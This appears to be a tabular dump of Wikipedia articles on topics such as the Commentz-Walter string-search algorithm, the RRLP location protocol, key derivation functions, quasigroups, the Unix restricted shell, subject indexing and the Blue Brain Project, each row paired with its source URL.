text
stringlengths 21
172k
| source
stringlengths 32
113
|
|---|---|
Incomputer science, theCommentz-Walter algorithmis astring searching algorithminvented byBeate Commentz-Walter.[1]Like theAho–Corasick string matching algorithm, it can search for multiple patterns at once. It combines ideas from Aho–Corasick with the fast matching of theBoyer–Moore string-search algorithm. For a text of lengthnand maximum pattern length ofm, its worst-case running time isO(mn), though the average case is often much better.[2]
GNUgreponce implemented a string matching algorithm very similar to Commentz-Walter.[3]
The paper on the algorithm was first published byBeate Commentz-Walterin 1979 through the Saarland University and typed by "R. Scherner".[1]The paper detailed two differing algorithms she claimed combined the idea of theAho-CorasickandBoyer-Moorealgorithms, which she called algorithms B and B1. The paper mostly focuses on algorithm B, however.
The Commentz-Walter algorithm combines two known algorithms in order to attempt to better address the multi-pattern matching problem. These two algorithms are theBoyer-Moore, which addresses single pattern matching using filtering, and theAho-Corasick. To do this, the algorithm implements a suffix automaton to search through patterns within an input string, while also using reverse patterns, unlike in theAho-Corasick.[4]
Commentz-Walter has two phases it must go through, these being a pre-computing phase and a matching phase. For the first phase, the Commentz-Walter algorithm uses a reversed pattern to build a pattern tree, this is considered the pre-computing phase. The second phase, known as the matching phase, takes into account the other two algorithms. Using theBoyer-Moore’s technique of shifting and theAho-Corasick's technique of finite automata, the Commentz-Walter algorithm can begin matching.[4]
The Commentz-Walter algorithm will scan backwards throughout an input string, checking for a mismatch. If and when the algorithm does find a mismatch, the algorithm will already know some of the characters that are matches, and then use this information as an index. Using the index, the algorithm checks the pre-computed table to find a distance that it must shift, after this, the algorithm once more begins another matching attempt.
Comparing theAho-Corasickto the Commentz-Walter Algorithm yields results with the idea of time complexity.Aho-Corasickis considered linearO(m+n+k) where k is the number of matches. Commentz-Walter may be considered quadraticO(mn). The reason for this lies in the fact that Commentz-Walter was developed by adding the shifts within theBoyer–Moore string-search algorithmto theAho-Corasick, thus moving its complexity from linear to quadratic.
According to a study done in “The Journal of National Science Foundation of Sri Lanka 46” Commentz-Walter seems to be generally faster than theAho–Corasick string matching algorithm. This, according to the journal, only exists when using long patterns. However, the journal does state that there is no critical analysis on this statement and that there is a lack of general agreement on the performance of the algorithm.[5]
As seen in a visualization of the algorithm’s running time done in a study by “The International Journal of Advanced Computer Science and Information Technology” the performance of the algorithm increased linearly as the shortest pattern within the pattern set increased.[4]
In the original Commentz-Walter paper, an alternative algorithm was also created. This algorithm, known as B1, operates similarly to the main Commentz-Walter algorithm with the only difference being in the way the pattern tree is used during the scanning phase.
The paper also claims this algorithm performs better at the cost of increasing the running time and space of both the preprocessing phase and search phase. This algorithm has not been formally tested in other studies however, so its actual performance is unknown.[1]
|
https://en.wikipedia.org/wiki/Commentz-Walter_algorithm
|
Radio resource location services (LCS) protocol(RRLP) applies toGSMandUMTSCellular Networks. It is used to exchange messages between a handset and anSMLCin order to provide geolocation information;[1]e.g., in the case of emergency calls. The protocol was developed in order to fulfil theWireless Enhanced 911requirements in the United States. However, since the protocol does not require any authentication, and can be used outside of a voice call or SMS transfer, its use is not restricted to emergency calls and can be used by law enforcement to pinpoint the exact geolocation of the target's mobile phone. RRLP was first specified in3GPPTS 04.31 - Location Services (LCS); Mobile Station (MS) - Serving Mobile Location Centre (SMLC); Radio Resource LCS Protocol (RRLP).[2]
Harald Welteproved atHAR2009[3]that many high-end smart-phones submit their GPS location to the mobile operator when requested. This happened without any sort of authentication.
RRLP supports two positioning methods:
The method type indicates whether MS based or assisted location is to be performed.
In this mode, the network typically needs to send so-called assistance data to the phone.
|
https://en.wikipedia.org/wiki/Radio_resource_location_services_protocol
|
Innumber theory, asphenic number(fromGreek:σφήνα, 'wedge') is apositive integerthat is theproductof three distinctprime numbers. Because there areinfinitely many prime numbers, there are also infinitely many sphenic numbers.
A sphenic number is a productpqrwherep,q, andrare three distinct prime numbers. In other words, the sphenic numbers are thesquare-free3-almost primes.
The smallest sphenic number is 30 = 2 × 3 × 5, the product of the smallest three primes.
The first few sphenic numbers are
The largest known sphenic number at any time can be obtained by multiplying together the threelargest known primes.
All sphenic numbers have exactly eight divisors. If we express the sphenic number asn=p⋅q⋅r{\displaystyle n=p\cdot q\cdot r}, wherep,q, andrare distinct primes, then the set of divisors ofnwill be:
The converse does not hold. For example, 24 is not a sphenic number, but it has exactly eight divisors.
All sphenic numbers are by definitionsquarefree, because the prime factors must be distinct.
TheMöbius functionof any sphenic number is −1.
Thecyclotomic polynomialsΦn(x){\displaystyle \Phi _{n}(x)}, taken over all sphenic numbersn, may contain arbitrarily large coefficients[1](forna product of two primes the coefficients are±1{\displaystyle \pm 1}or 0).
Any multiple of a sphenic number (except by 1) is not sphenic. This is easily provable by the multiplication process at a minimum adding another prime factor, or raising an existing factor to a higher power.
The first case of two consecutive sphenic integers is 230 = 2×5×23 and 231 = 3×7×11. The first case of three is 1309 = 7×11×17, 1310 = 2×5×131, and 1311 = 3×19×23. There is no case of more than three, because every fourth consecutive positive integer is divisible by 4 = 2×2 and therefore not squarefree.
The numbers 2013 (3×11×61), 2014 (2×19×53), and 2015 (5×13×31) are all sphenic. The next three consecutive sphenic years will be 2665 (5×13×41), 2666 (2×31×43) and 2667 (3×7×127) (sequenceA165936in theOEIS).
|
https://en.wikipedia.org/wiki/Sphenic_number
|
Incryptography, akey derivation function(KDF) is a cryptographic algorithm that derives one or moresecret keysfrom a secret value such as a master key, apassword, or apassphraseusing apseudorandom function(which typically uses acryptographic hash functionorblock cipher).[1][2][3]KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of aDiffie–Hellman key exchangeinto a symmetric key for use withAES.Keyed cryptographic hash functionsare popular examples of pseudorandom functions used for key derivation.[4]
The first[citation needed]deliberately slow (key stretching) password-based key derivation function was called "crypt" (or "crypt(3)" after itsman page), and was invented byRobert Morrisin 1978. It would encrypt a constant (zero), using the first 8 characters of the user's password as the key, by performing 25 iterations of a modifiedDESencryption algorithm (in which a 12-bit number read from the real-time computer clock is used to perturb the calculations). The resulting 64-bit number is encoded as 11 printable characters and then stored in theUnixpassword file.[5]While it was a great advance at the time, increases in processor speeds since thePDP-11era have made brute-force attacks against crypt feasible, and advances in storage have rendered the 12-bit salt inadequate. The crypt function's design also limits the user password to 8 characters, which limits the keyspace and makes strongpassphrasesimpossible.[citation needed]
Although high throughput is a desirable property in general-purpose hash functions, the opposite is true in password security applications in which defending against brute-force cracking is a primary concern. The growing use of massively-parallel hardware such as GPUs, FPGAs, and even ASICs for brute-force cracking has made the selection of a suitable algorithms even more critical because the good algorithm should not only enforce a certain amount of computational cost not only on CPUs, but also resist the cost/performance advantages of modern massively-parallel platforms for such tasks. Various algorithms have been designed specifically for this purpose, includingbcrypt,scryptand, more recently,Lyra2andArgon2(the latter being the winner of thePassword Hashing Competition). The large-scaleAshley Madison data breachin which roughly 36 million passwords hashes were stolen by attackers illustrated the importance of algorithm selection in securing passwords. Although bcrypt was employed to protect the hashes (making large scale brute-force cracking expensive and time-consuming), a significant portion of the accounts in the compromised data also contained a password hash based on the fast general-purposeMD5algorithm, which made it possible for over 11 million of the passwords to be cracked in a matter of weeks.[6]
In June 2017, The U.S. National Institute of Standards and Technology (NIST) issued a new revision of their digital authentication guidelines, NIST SP 800-63B-3,[7]: 5.1.1.2stating that: "Verifiers SHALL store memorized secrets [i.e. passwords] in a form that is resistant to offline attacks. Memorized secrets SHALL be salted and hashed using a suitable one-way key derivation function. Key derivation functions take a password, a salt, and a cost factor as inputs then generate a password hash. Their purpose is to make each password guessing trial by an attacker who has obtained a password hash file expensive and therefore the cost of a guessing attack high or prohibitive."
Modern password-based key derivation functions, such asPBKDF2,[2]are based on a recognized cryptographic hash, such asSHA-2, use more salt (at least 64 bits and chosen randomly) and a high iteration count. NIST recommends a minimum iteration count of 10,000.[7]: 5.1.1.2"For especially critical keys, or for very powerful systems or systems where user-perceived performance is not critical, an iteration count of 10,000,000 may be appropriate.”[8]: 5.2
The original use for a KDF is key derivation, the generation of keys from secret passwords or passphrases. Variations on this theme include:
Key derivation functions are also used in applications to derive keys from secret passwords or passphrases, which typically do not have the desired properties to be used directly as cryptographic keys. In such applications, it is generally recommended that the key derivation function be made deliberately slow so as to frustratebrute-force attackordictionary attackon the password or passphrase input value.
Such use may be expressed asDK = KDF(key, salt, iterations), whereDKis the derived key,KDFis the key derivationfunction,keyis the original key or password,saltis a random number which acts ascryptographic salt, anditerationsrefers to the number ofiterationsof a sub-function. The derived key is used instead of the original key or password as the key to the system. The values of the salt and the number of iterations (if it is not fixed) are stored with the hashed password or sent ascleartext(unencrypted) with an encrypted message.[10]
The difficulty of a brute force attack is increased with the number of iterations. A practical limit on the iteration count is the unwillingness of users to tolerate a perceptible delay in logging into a computer or seeing a decrypted message. The use ofsaltprevents the attackers from precomputing a dictionary of derived keys.[10]
An alternative approach, calledkey strengthening, extends the key with a random salt, but then (unlike in key stretching) securely deletes the salt.[11]This forces both the attacker and legitimate users to perform a brute-force search for the salt value.[12]Although the paper that introduced key stretching[13]referred to this earlier technique and intentionally chose a different name, the term "key strengthening" is now often (arguably incorrectly) used to refer to key stretching.
Despite their original use for key derivation, KDFs are possibly better known for their use inpassword hashing(password verification by hash comparison), as used by thepasswdfile orshadow passwordfile. Password hash functions should be relatively expensive to calculate in case of brute-force attacks, and thekey stretchingof KDFs happen to provide this characteristic.[citation needed]The non-secret parameters are called "salt" in this context.
In 2013 aPassword Hashing Competitionwas announced to choose a new, standard algorithm for password hashing. On 20 July 2015 the competition ended andArgon2was announced as the final winner. Four other algorithms received special recognition: Catena,Lyra2, Makwa andyescrypt.[14]
As of May 2023, theOpen Worldwide Application Security Project(OWASP) recommends the following KDFs for password hashing, listed in order of priority:[15]
|
https://en.wikipedia.org/wiki/Password_hashing#Salting
|
Inmathematics, especially inabstract algebra, aquasigroupis analgebraic structurethat resembles agroupin the sense that "division" is always possible. Quasigroups differ from groups mainly in that theassociativeandidentity elementproperties are optional. In fact, a nonempty associative quasigroup is a group.[1][2]
A quasigroup that has an identity element is called aloop.
There are at least two structurally equivalent formal definitions of quasigroup:
Thehomomorphicimageof a quasigroup that is defined with a single binary operation, however, need not be a quasigroup, in contrast to a quasigroup as having three primitive operations.[3]We begin with the first definition.
Aquasigroup(Q, ∗)is a non-emptysetQwith a binary operation∗(that is, amagma, indicating that a quasigroup has to satisfy the closure property), obeying theLatin square property. This states that, for eachaandbinQ, there exist unique elementsxandyinQsuch that botha∗x=b{\displaystyle a\ast x=b}y∗a=b{\displaystyle y\ast a=b}hold. (In other words: Each element of the set occurs exactly once in each row and exactly once in each column of the quasigroup's multiplication table, orCayley table. This property ensures that the Cayley table of a finite quasigroup, and, in particular, a finite group, is aLatin square.) The requirement thatxandybe unique can be replaced by the requirement that the magma becancellative.[4][a]
The unique solutions to these equations are writtenx=a\bandy=b/a. The operations '\' and '/' are called, respectively,left divisionandright division. With regard to the Cayley table, the first equation (left division) means that thebentry in thearow is in thexcolumn while the second equation (right division) means that thebentry in theacolumn is in theyrow.
Theempty setequipped with theempty binary operationsatisfies this definition of a quasigroup. Some authors accept the empty quasigroup but others explicitly exclude it.[5][6]
Given somealgebraic structure, anidentityis an equation in which all variables are tacitlyuniversally quantified, and in which alloperationsare among the primitive operations proper to the structure. Algebraic structures that satisfy axioms that are given solely by identities are called avariety. Many standard results inuniversal algebrahold only for varieties. Quasigroups form a variety if left and right division are taken as primitive.
Aright-quasigroup(Q, ∗, /)is a type(2, 2)algebra that satisfy both identities:y=(y/x)∗x{\displaystyle y=(y/x)\ast x}y=(y∗x)/x{\displaystyle y=(y\ast x)/x}
Aleft-quasigroup(Q, ∗, \)is a type(2, 2)algebra that satisfy both identities:y=x∗(x∖y){\displaystyle y=x\ast (x\backslash y)}y=x∖(x∗y){\displaystyle y=x\backslash (x\ast y)}
Aquasigroup(Q, ∗, \, /)is a type(2, 2, 2)algebra (i.e., equipped with three binary operations) that satisfy the identities:[b]y=(y/x)∗x{\displaystyle y=(y/x)\ast x}y=(y∗x)/x{\displaystyle y=(y\ast x)/x}y=x∗(x∖y){\displaystyle y=x\ast (x\backslash y)}y=x∖(x∗y){\displaystyle y=x\backslash (x\ast y)}
In other words: Multiplication and division in either order, one after the other, on the same side by the same element, have no net effect.
Hence if(Q, ∗)is a quasigroup according to the definition of the previous section, then(Q, ∗, \, /)is the same quasigroup in the sense of universal algebra. And vice versa: if(Q, ∗, \, /)is a quasigroup according to the sense of universal algebra, then(Q, ∗)is a quasigroup according to the first definition.
Aloopis a quasigroup with anidentity element; that is, an element,e, such that
It follows that the identity element,e, is unique, and that every element ofQhas uniqueleftandright inverses(which need not be the same).
A quasigroup with anidempotent elementis called apique("pointed idempotent quasigroup"); this is a weaker notion than a loop but common nonetheless because, for example, given anabelian group,(A, +), taking its subtraction operation as quasigroup multiplication yields a pique(A, −)with the group identity (zero) turned into a "pointed idempotent". (That is, there is aprincipal isotopy(x,y,z) ↦ (x, −y,z).)
A loop that is associative is a group. A group can have a strictly nonassociative pique isotope, but it cannot have a strictly nonassociative loop isotope.
There are weaker associativity properties that have been given special names.
For instance, aBol loopis a loop that satisfies either:
or else
A loop that is both a left and right Bol loop is aMoufang loop. This is equivalent to any one of the following single Moufang identities holding for allx,y,z:
According to Jonathan D. H. Smith, "loops" were named after theChicago Loop, as their originators were studying quasigroups in Chicago at the time.[9]
Smith (2007)names the following important properties and subclasses:
A quasigroup issemisymmetricif any of the following equivalent identities hold for allx,y:[c]
Although this class may seem special, every quasigroupQinduces a semisymmetric quasigroupQΔ on the direct product cubeQ3via the following operation:
where "//" and "\\" are theconjugate division operationsgiven byy//x=x/yandy\\x=x\y.
A quasigroup may exhibit semisymmetrictriality.[10]
A narrower class is atotally symmetric quasigroup(sometimes abbreviatedTS-quasigroup) in which allconjugatescoincide as one operation:x∗y=x/y=x\y. Another way to define (the same notion of) totally symmetric quasigroup is as a semisymmetric quasigroup that is commutative, i.e.x∗y=y∗x.
Idempotent total symmetric quasigroups are precisely (i.e. in a bijection with)Steiner triples, so such a quasigroup is also called aSteiner quasigroup, and sometimes the latter is even abbreviated assquag. The termslooprefers to an analogue for loops, namely, totally symmetric loops that satisfyx∗x= 1instead ofx∗x=x. Without idempotency, total symmetric quasigroups correspond to the geometric notion ofextended Steiner triple, also called Generalized Elliptic Cubic Curve (GECC).
A quasigroup(Q, ∗)is calledweakly totally anti-symmetricif for allc,x,y∈Q, the following implication holds.[11]
A quasigroup(Q, ∗)is calledtotally anti-symmetricif, in addition, for allx,y∈Q, the following implication holds:[11]
This property is required, for example, in theDamm algorithm.
Quasigroups have thecancellation property: ifab=ac, thenb=c. This follows from the uniqueness of left division ofaboracbya. Similarly, ifba=ca, thenb=c.
The Latin square property of quasigroups implies that, given any two of the three variables inxy=z, the third variable is uniquely determined.
The definition of a quasigroup can be treated as conditions on the left and rightmultiplication operatorsLx,Rx:Q→Q, defined by
The definition says that both mappings arebijectionsfromQto itself. A magmaQis a quasigroup precisely when all these operators, for everyxinQ, are bijective. The inverse mappings are left and right division, that is,
In this notation the identities among the quasigroup's multiplication and division operations (stated in the section onuniversal algebra) are
whereiddenotes the identity mapping onQ.
The multiplication table of a finite quasigroup is aLatin square: ann×ntable filled withndifferent symbols in such a way that each symbol occurs exactly once in each row and exactly once in each column.
Conversely, every Latin square can be taken as the multiplication table of a quasigroup in many ways: the border row (containing the column headers) and the border column (containing the row headers) can each be any permutation of the elements. SeeSmall Latin squares and quasigroups.
For acountably infinitequasigroupQ, it is possible to imagine an infinite array in which every row and every column corresponds to some elementqofQ, and where the elementa∗bis in the row corresponding toaand the column responding tob. In this situation too, the Latin square property says that each row and each column of the infinite array will contain every possible value precisely once.
For anuncountably infinitequasigroup, such as the group of non-zeroreal numbersunder multiplication, the Latin square property still holds, although the name is somewhat unsatisfactory, as it is not possible to produce the array of combinations to which the above idea of an infinite array extends since the real numbers cannot all be written in asequence. (This is somewhat misleading however, as the reals can be written in a sequence of lengthc{\displaystyle {\mathfrak {c}}}, assuming thewell-ordering theorem.)
The binary operation of a quasigroup isinvertiblein the sense that bothLxandRx, theleft and right multiplication operators, are bijective, and henceinvertible.
Every loop element has a unique left and right inverse given by
A loop is said to have (two-sided)inversesifxλ=xρfor allx. In this case the inverse element is usually denoted byx−1.
There are some stronger notions of inverses in loops that are often useful:
A loop has theinverse propertyif it has both the left and right inverse properties. Inverse property loops also have the antiautomorphic and weak inverse properties. In fact, any loop that satisfies any two of the above four identities has the inverse property and therefore satisfies all four.
Any loop that satisfies the left, right, or antiautomorphic inverse properties automatically has two-sided inverses.
A quasigroup or loophomomorphismis amapf:Q→Pbetween two quasigroups such thatf(xy) =f(x)f(y). Quasigroup homomorphisms necessarily preserve left and right division, as well as identity elements (if they exist).
LetQandPbe quasigroups. Aquasigroup homotopyfromQtoPis a triple(α,β,γ)of maps fromQtoPsuch that
for allx,yinQ. A quasigroup homomorphism is just a homotopy for which the three maps are equal.
Anisotopyis a homotopy for which each of the three maps(α,β,γ)is abijection. Two quasigroups areisotopicif there is an isotopy between them. In terms of Latin squares, an isotopy(α,β,γ)is given by a permutation of rowsα, a permutation of columnsβ, and a permutation on the underlying element setγ.
Anautotopyis an isotopy from a quasigroup to itself. The set of all autotopies of a quasigroup forms a group with theautomorphism groupas a subgroup.
Every quasigroup is isotopic to a loop. If a loop is isotopic to a group, then it is isomorphic to that group and thus is itself a group. However, a quasigroup that is isotopic to a group need not be a group. For example, the quasigroup onRwith multiplication given by(x,y) ↦ (x+y)/2is isotopic to the additive group(R, +), but is not itself a group as it has no identity element. Everymedialquasigroup is isotopic to anabelian groupby theBruck–Toyoda theorem.
Left and right division are examples of forming a quasigroup by permuting the variables in the defining equation. From the original operation ∗ (i.e.,x∗y=z) we can form five new operations:xoy:=y∗x(theoppositeoperation),/and\, and their opposites. That makes a total of six quasigroup operations, which are called theconjugatesorparastrophesof ∗. Any two of these operations are said to be "conjugate" or "parastrophic" to each other (and to themselves).
If the setQhas two quasigroup operations, ∗ and ·, and one of them is isotopic to a conjugate of the other, the operations are said to beisostrophicto each other. There are also many other names for this relation of "isostrophe", e.g.,paratopy.
Ann-ary quasigroupis a set with ann-ary operation,(Q,f)withf:Qn→Q, such that the equationf(x1, ...,xn) =yhas a unique solution for any one variable if all the othernvariables are specified arbitrarily.Polyadicormultiarymeansn-ary for some nonnegative integern.
A 0-ary, ornullary, quasigroup is just a constant element ofQ. A 1-ary, orunary, quasigroup is a bijection ofQto itself. Abinary, or 2-ary, quasigroup is an ordinary quasigroup.
An example of a multiary quasigroup is an iterated group operation,y=x1·x2· ··· ·xn; it is not necessary to use parentheses to specify the order of operations because the group is associative. One can also form a multiary quasigroup by carrying out any sequence of the same or different group or quasigroup operations, if the order of operations is specified.
There exist multiary quasigroups that cannot be represented in any of these ways. Ann-ary quasigroup isirreducibleif its operation cannot be factored into the composition of two operations in the following way:
where1 ≤i<j≤nand(i,j) ≠ (1,n). Finite irreduciblen-ary quasigroups exist for alln> 2; seeAkivis & Goldberg (2001)for details.
Ann-ary quasigroup with ann-ary version ofassociativityis called ann-ary group.
The number of isomorphism classes of small quasigroups (sequenceA057991in theOEIS) and loops (sequenceA057771in theOEIS) is given here:[14]
|
https://en.wikipedia.org/wiki/Quasigroup
|
Therestricted shellis aUnix shellthat restricts some of the capabilities available to an interactive user session, or to ashell script, running within it. It is intended to provide an additional layer of security, but is insufficient to allow execution of entirely untrusted software. A restricted mode operation is found in the originalBourne shell[1]and its later counterpartBash,[2]and in theKornShell.[3]In some cases a restricted shell is used in conjunction with achrootjail, in a further attempt to limit access to the system as a whole.
The restricted mode of the Bourne shellsh, and its POSIX workalikes, is used when the interpreter is invoked in one of the following ways:
The restricted mode of Bash is used when Bash is invoked in one of the following ways:
Similarly KornShell's restricted mode is produced by invoking it thus:
For some systems (e.g.,CentOS), the invocation throughrbashis not enabled by default, and the user obtains acommand not founderror if invoked directly, or a login failure if the/etc/passwdfile indicates/bin/rbashas the user's shell.
It suffices to create a link namedrbashpointing directly tobash. Though this invokes Bash directly, without the-ror--restrictedoptions, Bash does recognize that it was invoked throughrbashand it does come up as a restricted shell.
This can be accomplished with the following simple commands (executed as root, either logged in as user root, or usingsudo):
The following operations are not permitted in a restricted shell:
Bash adds further restrictions, including:[2]
Restrictions in the restricted KornShell are much the same as those in the restricted Bourne shell.[4]
The restricted shell is not secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function invibeing used to escape from the restricted shell:
Or by simply starting a new unrestricted shell, if it is in thePATH, as demonstrated here:
Beyond the restricted modes of usual shells, specialized restricted shell programs include:
|
https://en.wikipedia.org/wiki/Restricted_shell
|
Subject indexingis the act of describing orclassifyingadocumentbyindex terms, keywords, or other symbols in order to indicate what different documents areabout, to summarize theircontentsor to increasefindability. In other words, it is about identifying and describing thesubjectof documents. Indexes are constructed, separately, on three distinct levels: terms in a document such as a book; objects in a collection such as a library; and documents (such as books and articles) within a field of knowledge.
Subject indexing is used ininformation retrievalespecially to createbibliographic indexesto retrieve documents on a particular subject. Examples of academic indexing services areZentralblatt MATH,Chemical AbstractsandPubMed. The index terms were mostly assigned by experts but author keywords are also common.
The process of indexing begins with any analysis of the subject of the document. The indexer must then identify terms which appropriately identify the subject either by extracting words directly from the document or assigning words from acontrolled vocabulary.[1]The terms in the index are then presented in a systematic order.
Indexers must decide how many terms to include and how specific the terms should be. Together this gives a depth of indexing.
The first step in indexing is to decide on the subject matter of the document. In manual indexing, the indexer would consider the subject matter in terms of answer to a set of questions such as "Does the document deal with a specific product, condition or phenomenon?".[2]As the analysis is influenced by the knowledge and experience of the indexer, it follows that two indexers may analyze the content differently and so come up with different index terms. This will impact on the success of retrieval.
Automatic indexingfollows set processes of analyzing frequencies of word patterns and comparing results to other documents in order to assign to subject categories. This requires no understanding of the material being indexed. This leads to more uniform indexing but at the expense of the true meaning being interpreted. A computer program will not understand the meaning of statements and may therefore fail to assign some relevant terms or assign incorrectly. Human indexers focus their attention on certain parts of the document such as the title, abstract, summary and conclusions, as analyzing the full text in depth is costly and time-consuming.[3]An automated system takes away the time limit and allows the entire document to be analyzed, but also has the option to be directed to particular parts of the document.
The second stage of indexing involves the translation of the subject analysis into a set ofindex terms. This can involve extracting from the document or assigning from acontrolled vocabulary. With the ability to conduct afull text searchwidely available, many people have come to rely on their own expertise in conducting information searches and full text search has become very popular. Subject indexing and its experts, professional indexers,catalogers, andlibrarians, remains crucial to information organization and retrieval. These experts understand controlled vocabularies and are able to find information that cannot be located by full text search. The cost of expert analysis to create subject indexing is not easily compared to the cost of hardware, software and labor to manufacture a comparable set of full-text, fully searchable materials. With new web applications that allow every user to annotate documents,social tagginghas gained popularity especially in the Web.[4]
One application of indexing, thebook index, remains relatively unchanged despite theinformation revolution.
Extraction indexing involves taking words directly from the document. It usesnatural languageand lends itself well to automated techniques where word frequencies are calculated and those with a frequency over a pre-determined threshold are used as index terms. A stop-list containing common words (such as "the", "and") would be referred to and suchstop wordswould be excluded as index terms.
Automated extraction indexing may lead to loss of meaning of terms by indexing single words as opposed to phrases. Although it is possible to extract commonly occurring phrases, it becomes more difficult if key concepts are inconsistently worded in phrases. Automated extraction indexing also has the problem that, even with use of a stop-list to remove common words, some frequent words may not be useful for allowing discrimination between documents. For example, the term glucose is likely to occur frequently in any document related to diabetes. Therefore, use of this term would likely return most or all the documents in the database. Post-coordinated indexing where terms are combined at the time of searching would reduce this effect but the onus would be on the searcher to link appropriate terms as opposed to the information professional. In addition terms that occur infrequently may be highly significant for example a new drug may be mentioned infrequently but the novelty of the subject makes any reference significant. One method for allowing rarer terms to be included and common words to be excluded by automated techniques would be a relative frequency approach where frequency of a word in a document is compared to frequency in the database as a whole. Therefore, a term that occurs more often in a document than might be expected based on the rest of the database could then be used as an index term, and terms that occur equally frequently throughout will be excluded.
Another problem with automated extraction is that it does not recognize when a concept is discussed but is not identified in the text by an indexable keyword.[5]
Since this process is based on simple string matching and involves no intellectual analysis, the resulting product is more appropriately known as aconcordancethan an index.
An alternative is assignment indexing where index terms are taken from a controlled vocabulary. This has the advantage of controlling forsynonymsas the preferred term is indexed and synonyms or related terms direct the user to the preferred term. This means the user can find articles regardless of the specific term used by the author and saves the user from having to know and check all possible synonyms.[6]It also removes any confusion caused byhomographsby inclusion of a qualifying term. A third advantage is that it allows the linking of related terms whether they are linked by hierarchy or association, e.g. an index entry for an oral medication may list other oral medications as related terms on the same level of the hierarchy but would also link to broader terms such as treatment. Assignment indexing is used in manual indexing to improve inter-indexer consistency as different indexers will have a controlled set of terms to choose from. Controlled vocabularies do not completely remove inconsistencies as two indexers may still interpret the subject differently.[2]
The final phase of indexing is to present the entries in a systematic order. This may involve linking entries. In a pre-coordinated index the indexer determines the order in which terms are linked in an entry by considering how a user may formulate their search. In a post-coordinated index, the entries are presented singly and the user can link the entries through searches, most commonly carried out by computer software. Post-coordination results in a loss of precision in comparison to pre-coordination.[7]
Indexers must make decisions about what entries should be included and how many entries an index should incorporate. The depth of indexing describes the thoroughness of the indexing process with reference to exhaustivity and specificity.[8]
An exhaustive index is one which lists all possible index terms. Greater exhaustivity gives a higherrecall, or more likelihood of all the relevant articles being retrieved, however, this occurs at the expense ofprecision. This means that the user may retrieve a larger number of irrelevant documents or documents which only deal with the subject in little depth. In a manual system a greater level of exhaustivity brings with it a greater cost as more man-hours are required. The additional time taken in an automated system would be much less significant. At the other end of the scale, in a selective index only the most important aspects are covered.[9]Recall is reduced in a selective index as if an indexer does not include enough terms, a highly relevant article may be overlooked. Therefore, indexers should strive for a balance and consider what the document may be used. They may also have to consider the implications of time and expense.
The specificity describes how closely the index terms match the topics they represent[10]An index is said to be specific if the indexer uses parallel descriptors to the concept of the document and reflects the concepts precisely.[11]Specificity tends to increase with exhaustivity as the more terms you include, the narrower those terms will be.
Hjørland(2011)[12]found that theories of indexing are at the deepest level connected to different theories of knowledge:
The core of indexing is, as stated by Rowley and Farrow[16]to evaluate a paper's contribution to knowledge and index it accordingly. Or, in the words of Hjørland (1992,[17]1997) to index its informative potentials.
"In order to achieve good consistent indexing, the indexer must have a thorough appreciation of the structure of the subject and the nature of the contribution that the document is making to the advancement of knowledge" (Rowley & Farrow, 2000,[16]p. 99).
|
https://en.wikipedia.org/wiki/Subject_indexing
|
TheBlue Brain Projectwas a Swiss brain research initiative that aimed to create adigital reconstructionof the mouse brain. The project was founded in May 2005 by the Brain Mind Institute ofÉcole Polytechnique Fédérale de Lausanne(EPFL) in Switzerland. The project ended in December 2024. Its mission was to use biologically-detailed digital reconstructions andsimulations of the mammalian brainto identify the fundamental principles of brain structure and function.
The project was headed by the founding directorHenry Markram—who also launched the EuropeanHuman Brain Project—and was co-directed by Felix Schürmann, Adriana Salvatore andSean Hill. Using aBlue Genesupercomputerrunning Michael Hines'sNEURON, the simulation involved a biologically realistic model ofneurons[1][2][3]and an empirically reconstructed modelconnectome.
There were a number of collaborations, including theCajal Blue Brain, which is coordinated by theSupercomputing and Visualization Center of Madrid(CeSViMa), and others run by universities and independent laboratories.
In 2006, the project made its first model of aneocortical columnwith simplified neurons.[4]In November 2007, it completed an initial model of the rat neocortical column. This marked the end of the first phase, delivering a data-driven process for creating, validating, and researching the neocortical column.[5][4][6]
Neocortical columns are considered by some researchers to be the smallest functional units of theneocortex,[7][8]and they are thought to be responsible for higher functions such asconscious thought. In humans, each column is about 2 mm (0.079 in) in length, has a diameter of 0.5 mm (0.020 in) and contains about 60,000 neurons.Ratneocortical columns are very similar in structure but contain only 10,000 neurons and 108synapses.
In 2009, Henry Markram claimed that a "detailed, functional artificial human brain can be built within the next 10 years".[9]He conceived theHuman Brain Project, to which the Blue Brain Project contributed,[4]and which became funded in 2013 by the European Union with up to $1.3 billion.[10]
In 2015, the project simulated part of a rat brain with 30,000 neurons.[11]Also in 2015, scientists atÉcole Polytechnique Fédérale de Lausanne(EPFL) developed a quantitative model of the previously unknown relationship between the neurons and theastrocytes. This model describes the energy management of the brain through the function of the neuro-glial vascular unit (NGV). The additional layer of neuron andglial cellsis being added to Blue Brain Project models to improve functionality of the system.[12]
In 2017, Blue Brain Project discovered thatneural cliquesconnected to one another in up to eleven dimensions. The project's director suggested that the difficulty of understanding the brain is partly because the mathematics usually applied for studyingneural networkscannot detect that many dimensions. The Blue Brain Project was able to model these networks usingalgebraic topology.[13]
In 2018, Blue Brain Project released its first digital 3D brain cell atlas[14]which, according toScienceDaily, is like "going from hand-drawn maps to Google Earth", providing information about major cell types, numbers, and positions in 737 regions of the brain.[15]
In 2019, Idan Segev, one of thecomputational neuroscientistsworking on the Blue Brain Project, gave a talk titled: "Brain in the computer: what did I learn from simulating the brain." In his talk, he mentioned that the whole cortex for the mouse brain was complete and virtualEEGexperiments would begin soon. He also mentioned that the model had become too heavy on the supercomputers they were using at the time, and that they were consequently exploring methods in which every neuron could be represented as anartificial neural network(see citation for details).[16]
In 2022, scientists at the Blue Brain Project used algebraic topology to create an algorithm, Topological Neuronal Synthesis, that generates a large number of unique cells using only a few examples, synthesizing millions of unique neuronal morphologies. This allows them to replicate both healthy and diseased states of the brain. In a paper Kenari et al. were able to digitally synthesize dendritic morphologies from the mouse brain using this algorithm. They mapped entire brain regions from just a few reference cells. Since it is open source, this will enable the modelling of brain diseases and eventually, the algorithm could lead to digital twins of brains.[17]
The Blue Brain Project has developed a number of software to reconstruct and to simulate the mouse brain. All software tools mentioned below areopen source softwareand available for everyone onGitHub.[18][19][20][21][22][23]
Blue Brain Nexus[24][25][26]is a data integration platform which uses aknowledge graphto enable users to search, deposit, and organise data. It stands on theFAIR dataprinciples to provide flexible data management solutions beyond neuroscience studies.
